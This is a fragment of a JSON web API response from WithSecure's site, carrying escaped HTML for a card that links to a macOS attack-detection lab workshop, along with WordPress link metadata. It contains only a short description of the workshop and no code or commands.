class=\"wp-component-card-insight__category\">Endpoint Security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals 2021: macOS &#8211; Lab #1<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Over the three labs we have set out for this workshop, we&#039;re aiming to develop an initial level of understanding for some of the attacks we see against macOS and most importantly how we can implement appropriate detections. The labs for this workshop are comprised of the following key areas:<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-2021-macos-lab-1\/\">En savoir plus<\/a>            <\/div>\n            
<\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/lab_item\/10501","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/users\/3"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/media?parent=10501"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/categories?post=10501"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/fr\/wp-json\/wp\/v2\/labs_content_type?post=10501"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}